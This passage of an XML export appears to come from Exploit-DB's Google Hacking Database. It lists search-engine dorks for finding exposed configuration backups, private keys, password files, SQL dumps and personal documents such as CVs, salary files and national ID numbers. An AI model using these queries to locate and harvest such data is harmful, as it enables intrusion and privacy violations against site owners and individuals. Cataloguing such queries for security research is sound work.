<query>Fwd: Google Dork: inurl:login/login-user</query>
<querystring>https://www.google.com/search?q=Fwd: Google Dork: inurl:login/login-user</querystring>
<edb></edb>
<date>2023-10-20</date>
<author>Faridul Hasan</author>
</entry>
<entry>
<id>7837</id>
<link>https://www.exploit-db.com/ghdb/7837</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Fwd: intitle:&quot;atvise - next generation&quot;</shortDescription>
<textualDescription># Google Dork: Fwd: intitle:&quot;atvise - next generation&quot;
# Files Containing Juicy Info
# Date:19/11/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;atvise - next generation&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;atvise - next generation&quot;</querystring>
<edb></edb>
<date>2021-11-19</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7465</id>
<link>https://www.exploit-db.com/ghdb/7465</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Fwd: intitle:&quot;Authorize application&quot; &quot;Learn more about OAuth&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Authorize application&quot; &quot;Learn more about OAuth&quot;
# Files Containing Juicy Info
# Date: 20/10/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>Fwd: intitle:&quot;Authorize application&quot; &quot;Learn more about OAuth&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Authorize application&quot; &quot;Learn more about OAuth&quot;</querystring>
<edb></edb>
<date>2021-10-20</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7835</id>
<link>https://www.exploit-db.com/ghdb/7835</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Fwd: intitle:&quot;Index of /&quot; intext:&quot;resource/&quot;</shortDescription>
<textualDescription># Google Dork: Fwd: intitle:&quot;Index of /&quot; intext:&quot;resource/&quot;
# Files Containing Juicy Info
# Date:18/11/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;Index of /&quot; intext:&quot;resource/&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Index of /&quot; intext:&quot;resource/&quot;</querystring>
<edb></edb>
<date>2021-11-19</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>8268</id>
<link>https://www.exploit-db.com/ghdb/8268</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Fwd: intitle:&quot;index of&quot; &quot;login&quot; site:bd</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;login&quot; site:bd
# Files Containing Juicy Info
# Date:20/10/2023
# Exploit Author: Faridul Hasan
</textualDescription>
<query>Fwd: intitle:&quot;index of&quot; &quot;login&quot; site:bd</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;index of&quot; &quot;login&quot; site:bd</querystring>
<edb></edb>
<date>2023-10-20</date>
<author>Faridul Hasan</author>
</entry>
<entry>
<id>2</id>
<link>https://www.exploit-db.com/ghdb/2</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Ganglia Cluster Reports</shortDescription>
<textualDescription>These are server cluster reports, great for info gathering. Lesse, what were those server names again?</textualDescription>
<query>intitle:&quot;Ganglia&quot; &quot;Cluster Report for&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Ganglia%22+%22Cluster+Report+for%22</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>8137</id>
<link>https://www.exploit-db.com/ghdb/8137</link>
<category>Files Containing Juicy Info</category>
<shortDescription>GHDB-GOOGLE DORK</shortDescription>
<textualDescription># Google Dork: index.of conf.bak
# Files Containing Juicy Info
# Date:06/04/2023
# Exploit Author: Ishaq Mahmud</textualDescription>
<query>GHDB-GOOGLE DORK</query>
<querystring>https://www.google.com/search?q=GHDB-GOOGLE DORK</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Ishaq Mahmud</author>
</entry>
<entry>
<id>3762</id>
<link>https://www.exploit-db.com/ghdb/3762</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Google Dork For Social Security Number ( In Spain and Argentina is D.N.I )</shortDescription>
<textualDescription>This dork locates social security numbers. Author: Luciano UNLP</textualDescription>
<query>Google Dork For Social Security Number ( In Spain and Argentina is D.N.I )</query>
<querystring>https://www.google.com/search?q=allintext:D.N.I+Numero</querystring>
<edb></edb>
<date>2011-12-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>3763</id>
<link>https://www.exploit-db.com/ghdb/3763</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Google Dork inurl:Curriculum Vitale filetype:doc ( Vital Informaticon , Addres, Telephone Numer, SSN , Full Name, Work , etc ) In Spanish.</shortDescription>
<textualDescription>This dork locates Curriculum Vitale files. Author: Luciano UNLP</textualDescription>
<query>Google Dork inurl:Curriculum Vitale filetype:doc ( Vital Informaticon , Addres, Telephone Numer, SSN , Full Name, Work , etc ) In Spanish.</query>
<querystring>https://www.google.com/search?q=inurl:Curriculum%20Vitale%20filetype:doc</querystring>
<edb></edb>
<date>2011-12-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>7433</id>
<link>https://www.exploit-db.com/ghdb/7433</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Google Dork: intitle:&quot;Index of&quot; &quot;Apache/2.4.50&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; &quot;Apache/2.4.50&quot;
# Files Containing Juicy Info
# Date:13/10/2021
# Exploit Author: Roshdy Essam</textualDescription>
<query>Google Dork: intitle:&quot;Index of&quot; &quot;Apache/2.4.50&quot;</query>
<querystring>https://www.google.com/search?q=Google Dork: intitle:&quot;Index of&quot; &quot;Apache/2.4.50&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>Roshdy Essam</author>
</entry>
<entry>
<id>8153</id>
<link>https://www.exploit-db.com/ghdb/8153</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Google Dork: intitle:&quot;index of&quot; &quot;properties.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;properties.json&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Arnob Biswas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;properties.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;properties.json&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Arnob Biswas</author>
</entry>
<entry>
<id>7303</id>
<link>https://www.exploit-db.com/ghdb/7303</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Google Dork: intitle:index.of ipconfig</shortDescription>
<textualDescription># Google Dork: intitle:index.of ipconfig
# Files Containing Juicy Info
# Date:21/09/2021
# Exploit Author: Bon Sai</textualDescription>
<query>Google Dork: intitle:index.of ipconfig</query>
<querystring>https://www.google.com/search?q=Google Dork: intitle:index.of ipconfig</querystring>
<edb></edb>
<date>2021-09-27</date>
<author>Bon Sai</author>
</entry>
<entry>
<id>8210</id>
<link>https://www.exploit-db.com/ghdb/8210</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Google dorks</shortDescription>
<textualDescription># Google Dork: intext:&quot;/login.php&quot; intitle:&quot;login&quot;
# Files Containing Juicy Info
# Date: 04/06/2023
# Exploit Author: Avadhesh Nishad
Avadhesh Nishad
( WEB APPLICATION SECURITY RESEARCHERS )
*POC Images Attached with this mail.*
[image: Screenshot (4).png]
[image: Screenshot (5).png]
</textualDescription>
<query>Google dorks</query>
<querystring>https://www.google.com/search?q=Google dorks</querystring>
<edb></edb>
<date>2023-07-04</date>
<author>Avadhesh Nishad</author>
</entry>
<entry>
<id>8276</id>
<link>https://www.exploit-db.com/ghdb/8276</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Google Dorks</shortDescription>
<textualDescription># Google Dork: intitle:index.of &quot;config.inc.php&quot;
# Files Containing Juicy Info
# Date: 25/10/2023
# Exploit Shubhranshu Gorai</textualDescription>
<query>Google Dorks</query>
<querystring>https://www.google.com/search?q=Google Dorks</querystring>
<edb></edb>
<date>2023-10-25</date>
<author>Shubhranshu Gorai</author>
</entry>
<entry>
<id>7836</id>
<link>https://www.exploit-db.com/ghdb/7836</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Google to wordpress</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;wp-config.php.bak&quot;
# Files Containing Juicy Info
# Date:18/11/2021
# Exploit Author: Aitor Herrero</textualDescription>
<query>Google to wordpress</query>
<querystring>https://www.google.com/search?q=Google to wordpress</querystring>
<edb></edb>
<date>2021-11-19</date>
<author>Aitor Herrero</author>
</entry>
<entry>
<id>43</id>
<link>https://www.exploit-db.com/ghdb/43</link>
<category>Files Containing Juicy Info</category>
<shortDescription>haccess.ctl (one way)</shortDescription>
<textualDescription>this is the frontpage(?) equivalent of htaccess, I believe. Anyhow, this file describes who can access the directory of the web server and where the other authorization files are. nice find.</textualDescription>
<query>intitle:index.of haccess.ctl</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex%2Eof+haccess%2Ectl</querystring>
<edb></edb>
<date>2003-06-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>44</id>
<link>https://www.exploit-db.com/ghdb/44</link>
<category>Files Containing Juicy Info</category>
<shortDescription>haccess.ctl (VERY reliable)</shortDescription>
<textualDescription>haccess.ctl is the frontpage(?) equivalent of the .htaccess file. Either way, this file decribes who can access a web page, and should not be shown to web surfers. Way to go, googledork. =PThis method is very reliable due to the use of this google query:filetype:ctl BasicThis pulls out the file by name then searches for a string inside of it (Basic) which appears in the standard template for this file.</textualDescription>
<query>filetype:ctl Basic</query>
<querystring>https://www.google.com/search?q=filetype%3Ahtaccess+Basic</querystring>
<edb></edb>
<date>2003-06-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>4908</id>
<link>https://www.exploit-db.com/ghdb/4908</link>
<category>Files Containing Juicy Info</category>
<shortDescription>hardware | software &quot;migration&quot; intitle:index.of ext:xls | xlsx | doc | docx | pdf</shortDescription>
<textualDescription>Information regarding company's IT migration process usefull to find out
why, how and what is the target changing/migrating.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>hardware | software &quot;migration&quot; intitle:index.of ext:xls | xlsx | doc | docx | pdf</query>
<querystring>https://www.google.com/search?q=hardware | software &quot;migration&quot; intitle:index.of ext:xls | xlsx | doc | docx | pdf</querystring>
<edb></edb>
<date>2018-08-07</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>3957</id>
<link>https://www.exploit-db.com/ghdb/3957</link>
<category>Files Containing Juicy Info</category>
<shortDescription>http://www.google.com/search?q=filetype:sql site:com and &quot;insert into&quot; admin &quot;2014&quot;</shortDescription>
<textualDescription>filetype:sql site:com and &quot;insert into&quot; admin &quot;2014&quot;
</textualDescription>
<query>filetype:sql site:com and &quot;insert into&quot; admin &quot;2014&quot;</query>
<querystring>https://www.google.com/search?q=filetype:sql site:com and &quot;insert into&quot; admin &quot;2014&quot;</querystring>
<edb></edb>
<date>2014-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4352</id>
<link>https://www.exploit-db.com/ghdb/4352</link>
<category>Files Containing Juicy Info</category>
<shortDescription>https://paper.dropbox.com inurl:/doc/</shortDescription>
<textualDescription>site:https://notes.dropbox.com inurl:/hp/
A google dork for Dropbox Paper that will allow us to access
documents of other users and see their email address that they use on
Dropbox.
https://secuna.ph
https://medium.com/@atom
Allan Jay Dumanhug</textualDescription>
<query>https://paper.dropbox.com inurl:/doc/</query>
<querystring>https://www.google.com/search?q=https://paper.dropbox.com inurl:/doc/</querystring>
<edb></edb>
<date>2016-11-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4399</id>
<link>https://www.exploit-db.com/ghdb/4399</link>
<category>Files Containing Juicy Info</category>
<shortDescription>httrack inurl:hts-log.txt ext:txt -github.com</shortDescription>
<textualDescription>Dork for data of httrack web site copy logs.
Enjoy.
Dork by Rootkit Pentester.</textualDescription>
<query>httrack inurl:hts-log.txt ext:txt -github.com</query>
<querystring>https://www.google.com/search?q=httrack inurl:hts-log.txt ext:txt -github.com</querystring>
<edb></edb>
<date>2017-02-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>3</id>
<link>https://www.exploit-db.com/ghdb/3</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ICQ chat logs, please...</shortDescription>
<textualDescription>ICQ (http://www.icq.com) allows you to store the contents of your online chats into a file. These folks have their entire ICQ directories online. On purpose?</textualDescription>
<query>intitle:&quot;Index of&quot; dbconvert.exe chats</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+dbconvert%2Eexe+chats</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>6234</id>
<link>https://www.exploit-db.com/ghdb/6234</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of &quot;backup.zip&quot;</shortDescription>
<textualDescription>Google Dork: index of &quot;backup.zip&quot;
Author: Hemant Patidar (HemantSolo)
Linkedin: https://www.linkedin.com/in/hemantsolo/
</textualDescription>
<query>index of &quot;backup.zip&quot;</query>
<querystring>https://www.google.com/search?q=index of &quot;backup.zip&quot;</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Hemant Patidar</author>
</entry>
<entry>
<id>6252</id>
<link>https://www.exploit-db.com/ghdb/6252</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of &quot;dbbackup&quot;</shortDescription>
<textualDescription>Dork: index of &quot;dbbackup&quot;
Category: Files Containing Juicy Info
Info: This Google Dork lists out backup folders/files on web servers
Exploit Author: Mayank Raheja
Thanks! Looking forward to your response.
Regards,
Mayank Raheja
</textualDescription>
<query>index of &quot;dbbackup&quot;</query>
<querystring>https://www.google.com/search?q=index of &quot;dbbackup&quot;</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Mayank Raheja</author>
</entry>
<entry>
<id>7898</id>
<link>https://www.exploit-db.com/ghdb/7898</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of &quot;fileadmin/php&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;fileadmin/php&quot;
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>index of &quot;fileadmin/php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;fileadmin/php&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>6250</id>
<link>https://www.exploit-db.com/ghdb/6250</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of &quot;logs.zip&quot;</shortDescription>
<textualDescription># Dork:- index of &quot;logs.zip&quot;
# Impact:- Files Containing Juicy Info
Thank you
Author:- Shivansh Kumar
Independent security researcher
India
</textualDescription>
<query>index of &quot;logs.zip&quot;</query>
<querystring>https://www.google.com/search?q=index of &quot;logs.zip&quot;</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Shivansh Kumar</author>
</entry>
<entry>
<id>6276</id>
<link>https://www.exploit-db.com/ghdb/6276</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of .svn/text-base/index.php.svn-base</shortDescription>
<textualDescription>Dork: index of .svn/text-base/index.php.svn-base
</textualDescription>
<query>index of .svn/text-base/index.php.svn-base</query>
<querystring>https://www.google.com/search?q=index of .svn/text-base/index.php.svn-base</querystring>
<edb></edb>
<date>2020-06-12</date>
<author>saivinayreddy</author>
</entry>
<entry>
<id>7451</id>
<link>https://www.exploit-db.com/ghdb/7451</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of / inurl:/pki/</shortDescription>
<textualDescription># Google Dork: index of / inurl:/pki/
# Files Containing Juicy Info
# Date:15/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>index of / inurl:/pki/</query>
<querystring>https://www.google.com/search?q=index of / inurl:/pki/</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>7512</id>
<link>https://www.exploit-db.com/ghdb/7512</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Index of /apidoc/api-web/target/classes/</shortDescription>
<textualDescription># Google Dork: Index of /apidoc/api-web/target/classes/
# Files Containing Juicy Info
# Date:28/10/2021
# Exploit Author: Faisal Habib</textualDescription>
<query>Index of /apidoc/api-web/target/classes/</query>
<querystring>https://www.google.com/search?q=Index of /apidoc/api-web/target/classes/</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>Faisal Habib</author>
</entry>
<entry>
<id>6288</id>
<link>https://www.exploit-db.com/ghdb/6288</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of /backend/prod/config</shortDescription>
<textualDescription>Dork: index of /backend/prod/config
Description : Files Containing Juicy Info
Author : Rahul Parmar
</textualDescription>
<query>index of /backend/prod/config</query>
<querystring>https://www.google.com/search?q=index of /backend/prod/config</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Rahul Parmar</author>
</entry>
<entry>
<id>7526</id>
<link>https://www.exploit-db.com/ghdb/7526</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Index of /vendor/spatie/robots-txt</shortDescription>
<textualDescription># Google Dork: Index of /vendor/spatie/robots-txt
# Files Containing Juicy Info
# Date:29/10/2021
# Exploit Author: Faisal Habib</textualDescription>
<query>Index of /vendor/spatie/robots-txt</query>
<querystring>https://www.google.com/search?q=Index of /vendor/spatie/robots-txt</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>Faisal Habib</author>
</entry>
<entry>
<id>8265</id>
<link>https://www.exploit-db.com/ghdb/8265</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of /wp-admin.jpg site:bd</shortDescription>
<textualDescription># Google Dork: index of /wp-admin.jpg site:bd
# Files Containing Juicy Info
# Date:19/10/2023
# Exploit Author: Rezwan Ahmed
</textualDescription>
<query>index of /wp-admin.jpg site:bd</query>
<querystring>https://www.google.com/search?q=index of /wp-admin.jpg site:bd</querystring>
<edb></edb>
<date>2023-10-19</date>
<author>Rezwan Ahmed</author>
</entry>
<entry>
<id>7956</id>
<link>https://www.exploit-db.com/ghdb/7956</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of /wp-admin.zip</shortDescription>
<textualDescription># Google Dork: index of /wp-admin.zip
# Files Containing Juicy Info
# Date:24/06/2022
# Exploit Author: Christian Galvan</textualDescription>
<query>index of /wp-admin.zip</query>
<querystring>https://www.google.com/search?q=index of /wp-admin.zip</querystring>
<edb></edb>
<date>2022-06-24</date>
<author>Christian Galvan</author>
</entry>
<entry>
<id>4277</id>
<link>https://www.exploit-db.com/ghdb/4277</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of /wp-content/uploads/userpro</shortDescription>
<textualDescription>Alot of juicy info found, some csv files found that had alot of personal
information.
Sometimes if you type ConversationUnread you can get the same results.
stag_1</textualDescription>
<query>index of /wp-content/uploads/userpro</query>
<querystring>https://www.google.com/search?q=index of /wp-content/uploads/userpro</querystring>
<edb></edb>
<date>2016-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>6663</id>
<link>https://www.exploit-db.com/ghdb/6663</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Index of /_vti_pvt +&quot;*.pwd&quot;</shortDescription>
<textualDescription># Google Dork: Index of /_vti_pvt +&quot;*.pwd&quot;
# Sensitive directories containing juicy information and usernames and passwords.
# Date: 9/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>Index of /_vti_pvt +&quot;*.pwd&quot;</query>
<querystring>https://www.google.com/search?q=Index of /_vti_pvt +&quot;*.pwd&quot;</querystring>
<edb></edb>
<date>2020-11-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6316</id>
<link>https://www.exploit-db.com/ghdb/6316</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Index of /__MACOSX/System</shortDescription>
<textualDescription># Dork: Index of /__MACOSX/System
# Name: Deepak Kumar Bharti
# Description: Will show some juicy information related to Parent directory
# and details.
</textualDescription>
<query>Index of /__MACOSX/System</query>
<querystring>https://www.google.com/search?q=Index of /__MACOSX/System</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>Deepak Kumar Bharti</author>
</entry>
<entry>
<id>7632</id>
<link>https://www.exploit-db.com/ghdb/7632</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of : &quot;phonebook &quot;</shortDescription>
<textualDescription># Google Dork: index of : &quot;phonebook &quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of : &quot;phonebook &quot;</query>
<querystring>https://www.google.com/search?q=index of : &quot;phonebook &quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7633</id>
<link>https://www.exploit-db.com/ghdb/7633</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of : &quot;truecaller&quot; &quot;uploads&quot;</shortDescription>
<textualDescription># Google Dork: index of : &quot;truecaller&quot; &quot;uploads&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of : &quot;truecaller&quot; &quot;uploads&quot;</query>
<querystring>https://www.google.com/search?q=index of : &quot;truecaller&quot; &quot;uploads&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7619</id>
<link>https://www.exploit-db.com/ghdb/7619</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of :&quot;uploads&quot; &quot;parent&quot; &quot;salary&quot; intext:salary</shortDescription>
<textualDescription># Google Dork: index of :&quot;uploads&quot; &quot;parent&quot; &quot;salary&quot; intext:salary
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of :&quot;uploads&quot; &quot;parent&quot; &quot;salary&quot; intext:salary</query>
<querystring>https://www.google.com/search?q=index of :&quot;uploads&quot; &quot;parent&quot; &quot;salary&quot; intext:salary</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7620</id>
<link>https://www.exploit-db.com/ghdb/7620</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of :wp-config.zip</shortDescription>
<textualDescription># Google Dork: index of :wp-config.zip
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of :wp-config.zip</query>
<querystring>https://www.google.com/search?q=index of :wp-config.zip</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>8223</id>
<link>https://www.exploit-db.com/ghdb/8223</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of cpanel.txt</shortDescription>
<textualDescription># Google Dork: index of cpanel.txt
# Files Containing Juicy Info
# Date: 08/09/2023
# Author: Ved Kolambkar</textualDescription>
<query>new google dork</query>
<querystring>https://www.google.com/search?q=new google dork</querystring>
<edb></edb>
<date>2023-09-08</date>
<author>Ved Kolambkar</author>
</entry>
<entry>
<id>7025</id>
<link>https://www.exploit-db.com/ghdb/7025</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of storage/oauth-private.key</shortDescription>
<textualDescription># Google Dork: index of storage/oauth-private.key
# Files Containing Juicy Info
# Exploit Author: Osman Arif
</textualDescription>
<query>index of storage/oauth-private.key</query>
<querystring>https://www.google.com/search?q=index of storage/oauth-private.key</querystring>
<edb></edb>
<date>2021-07-21</date>
<author>Osman Arif</author>
</entry>
<entry>
<id>8162</id>
<link>https://www.exploit-db.com/ghdb/8162</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Index of&quot; intext:&quot;source_code.zip</shortDescription>
<textualDescription># Google Dork: Index of&quot; intext:&quot;source_code.zip
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>Index of&quot; intext:&quot;source_code.zip</query>
<querystring>https://www.google.com/search?q=Index of&quot; intext:&quot;source_code.zip</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>7638</id>
<link>https://www.exploit-db.com/ghdb/7638</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;application form&quot; &quot;upload&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;application form&quot; &quot;upload&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;application form&quot; &quot;upload&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;application form&quot; &quot;upload&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7637</id>
<link>https://www.exploit-db.com/ghdb/7637</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;application&quot; &quot;upload&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;application&quot; &quot;upload&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;application&quot; &quot;upload&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;application&quot; &quot;upload&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7629</id>
<link>https://www.exploit-db.com/ghdb/7629</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;cache&quot; &quot;uploads&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;cache&quot; &quot;uploads&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;cache&quot; &quot;uploads&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;cache&quot; &quot;uploads&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7635</id>
<link>https://www.exploit-db.com/ghdb/7635</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;certificate&quot; &quot;upload&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;certificate&quot; &quot;upload&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;certificate&quot; &quot;upload&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;certificate&quot; &quot;upload&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7636</id>
<link>https://www.exploit-db.com/ghdb/7636</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;certificate&quot; &quot;wp-content&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;certificate&quot; &quot;wp-content&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;certificate&quot; &quot;wp-content&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;certificate&quot; &quot;wp-content&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7625</id>
<link>https://www.exploit-db.com/ghdb/7625</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;confidential&quot; &quot;uploads&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;confidential&quot; &quot;uploads&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;confidential&quot; &quot;uploads&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;confidential&quot; &quot;uploads&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7631</id>
<link>https://www.exploit-db.com/ghdb/7631</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;contracts&quot; &quot;uploads&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;contracts&quot; &quot;uploads&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;contracts&quot; &quot;uploads&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;contracts&quot; &quot;uploads&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7639</id>
<link>https://www.exploit-db.com/ghdb/7639</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;documents&quot; &quot;wp-content&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;documents&quot; &quot;wp-content&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>index of: &quot;documents&quot; &quot;wp-content&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;documents&quot; &quot;wp-content&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7671</id>
<link>https://www.exploit-db.com/ghdb/7671</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of: &quot;invoice&quot; &quot;upload&quot;</shortDescription>
<textualDescription># Google Dork: index of: &quot;invoice&quot; &quot;upload&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Raghavaraju Lohitha</textualDescription>
<query>index of: &quot;invoice&quot; &quot;upload&quot;</query>
<querystring>https://www.google.com/search?q=index of: &quot;invoice&quot; &quot;upload&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Raghavaraju Lohitha</author>
